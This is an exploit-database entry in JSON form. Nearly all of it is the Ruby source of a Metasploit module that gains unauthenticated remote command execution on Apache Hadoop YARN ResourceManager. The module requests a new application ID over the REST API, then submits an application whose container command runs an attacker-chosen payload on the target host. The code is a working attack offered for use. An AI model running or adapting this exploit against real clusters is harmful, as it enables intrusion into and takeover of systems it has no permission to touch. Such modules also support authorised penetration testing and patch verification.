Description
This Metasploit module exploits an unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API.
{"id": "1337DAY-ID-30719", "type": "zdt", "bulletinFamily": "exploit", "title": "Apache #Hadoop YARN ResourceManager Unauthenticated Command Execution Exploit", "description": "This Metasploit module exploits an unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API.", "published": "2018-07-13T00:00:00", "modified": "2018-07-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/30719", "reporter": "cbmixx", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-07-13T21:54:07", "viewCount": 13, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "sourceHref": "https://0day.today/exploit/30719", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Hadoop YARN ResourceManager Unauthenticated Command Execution',\r\n 'Description' => %q{\r\n This module exploits an unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'cbmixx', # Proof of concept\r\n 'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['URL', 'http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf'],\r\n ['URL', 'https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn']\r\n ],\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Oct 19 2016',\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options([Opt::RPORT(8088)])\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),\r\n 'method' => 'POST'\r\n )\r\n rescue Rex::ConnectionError\r\n vprint_error(\"#{peer} - Connection failed\")\r\n return CheckCode::Unknown\r\n end\r\n\r\n if res && res.code == 200 && res.body.include?('application-id')\r\n return CheckCode::Detected\r\n end\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n print_status('Sending Command')\r\n execute_cmdstager\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),\r\n 'method' => 'POST'\r\n )\r\n\r\n app_id = res.get_json_document['application-id']\r\n\r\n post = {\r\n 'application-id' => app_id,\r\n 'application-name' => Rex::Text.rand_text_alpha_lower(4..12),\r\n 'application-type' => 'YARN',\r\n 'am-container-spec' => {\r\n 'commands' => {'command' => cmd.to_s}\r\n }\r\n }\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),\r\n 'method' => 'POST',\r\n 'ctype' => 'application/json',\r\n 'data' => post.to_json\r\n )\r\n end\r\n\r\nend\n\n# 0day.today [2018-07-13] #", "_state": {"dependencies": 1645580219}}
{}
Apache #Hadoop YARN ResourceManager Unauthenticated Command Execution Exploit